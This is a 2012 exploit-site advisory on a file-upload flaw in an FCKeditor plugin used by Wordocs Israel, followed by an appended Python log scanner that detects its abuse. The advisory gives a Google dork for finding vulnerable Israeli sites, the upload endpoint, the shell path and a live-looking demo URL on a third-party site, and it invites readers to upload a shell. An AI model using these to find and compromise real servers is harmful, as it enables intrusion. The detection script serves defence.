----------------------------------------------------------------
Wordocs Israel FCKeditor Shell Upload Disclosure Vulnerabilities
----------------------------------------------------------------

# Exploit Title: Wordocs Israel FCKeditor Shell Upload Disclosure Vulnerabilities
# Google Dork: inurl:/files/wordocs/ site:il
# Application Name: [Wordocs Israel]
# Date: 2012-09-04
# Author: BHG Security Center
# Home: http://cc.black-hg.org - http://greyh4t.com/cc/
# Version: [ 0.4.1.16 ]
# Impact : [ High ]
# Tested on: [linux+apache]
# CVE : Webapps
# Finder(s):
    - Net.Edit0r (Net.Edit0r [at] att [dot] net)
# Note: Please note there is a vulnerability in the site of non-Israeli
# Description: You can directly upload your shellcode and use the server

+-----------------------+
|   Shellcode Upload    |
+-----------------------+

The vulnerable code is located in /FCKeditor/editor/plugins/uploadme/fck_uploadme.php

Proof of Concept:
-----------------

~ PoC : http://localhost/FCKeditor/editor/plugins/uploadme/fck_uploadme.php

~ File upload path : http://[Target]/files/wordocs/shell.php

~~~~~~~~

Demo : http://facet-theory.org/FCKeditor/editor/plugins/uploadme/fck_uploadme.php

~ Study of Vulnerability : http://www.mediafire.com/?qedv4dq6b4yfqcz

[-] Disclosure timeline:

[04/08/2011] - Vulnerabilities discovered
[14/10/2011] - Other vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org
[04/09/2012] - Public disclosure

# Greets To : Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t ~ Mr.XHat

THANKS TO ALL Iranian HackerZ ./Persian Gulf

===========================================[End]=============================================
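
A defender-side check for the two paths named in this advisory, added here as an example and not part of the original advisory: it scans web-server access logs for successful POSTs to the uploadme plugin and for requests to script files under /files/wordocs/. The combined log format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths taken from the advisory; compared lower-cased.
UPLOAD_ENDPOINT = "/fckeditor/editor/plugins/uploadme/fck_uploadme.php"
UPLOAD_DIR = "/files/wordocs/"
# Extensions commonly mapped to a script handler (assumed list; adjust per server).
# Also catches double extensions such as "x.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)

# Apache/nginx "combined" log format (assumed).
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines using documentation-only IP ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Sep/2012:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Sep/2012:10:02:11 +0000] "POST /FCKeditor/editor/plugins/uploadme/fck_uploadme.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Sep/2012:10:02:19 +0000] "GET /files/wordocs/shell.php HTTP/1.1" 200 48 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [04/Sep/2012:10:05:00 +0000] "GET /files/wordocs/report.doc HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [04/Sep/2012:10:09:30 +0000] "GET /files/wordocs/a%2Ephp HTTP/1.1" 200 210 "-" "Mozilla/5.0"',
]

def normalise(target):
    """Drop the query string, decode percent-escapes, lower-case the path."""
    return unquote(urlsplit(target).path).lower()

def find_upload_abuse(lines):
    """Return (kind, ip, timestamp, path) for uploads and script hits in the upload dir."""
    uploaders, findings = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m or not m["status"].startswith("2"):
            continue  # unparsable line or request that did not succeed
        path = normalise(m["target"])
        if m["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT):
            uploaders.add(m["ip"])
            findings.append(("upload", m["ip"], m["ts"], path))
        elif UPLOAD_DIR in path and SCRIPT_EXT.search(path.rsplit("/", 1)[-1]):
            # Same client uploaded earlier -> stronger signal than a lone script hit.
            kind = "script-after-upload" if m["ip"] in uploaders else "script-in-upload-dir"
            findings.append((kind, m["ip"], m["ts"], path))
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Any hit of the second kind means a script file is being served from the upload directory, which is worth checking on disk regardless of who requested it.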